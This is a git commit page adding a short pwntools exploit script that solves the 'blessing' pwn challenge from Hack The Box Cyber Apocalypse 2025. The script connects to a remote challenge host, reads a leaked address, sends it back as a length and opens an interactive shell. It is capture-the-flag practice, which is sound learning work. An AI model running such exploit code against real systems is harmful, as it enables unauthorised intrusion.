solved blessing
This commit is contained in:
11
htb/cyber_apocalypse_2025/pwn_blessing/exploit.py
Normal file
11
htb/cyber_apocalypse_2025/pwn_blessing/exploit.py
Normal file
@@ -0,0 +1,11 @@
|
||||
from pwn import remote
|
||||
|
||||
with remote('94.237.63.165', '33182') as p:
|
||||
p.recvuntil(b': ')
|
||||
address = p.recvuntil(b': ')[:14]
|
||||
len = int(address.decode(), 0)
|
||||
p.recvuntil(b': ')
|
||||
p.sendline(f'{len}')
|
||||
p.recvuntil(b': ')
|
||||
p.sendline(b'A')
|
||||
p.interactive()
|
||||
Reference in New Issue
Block a user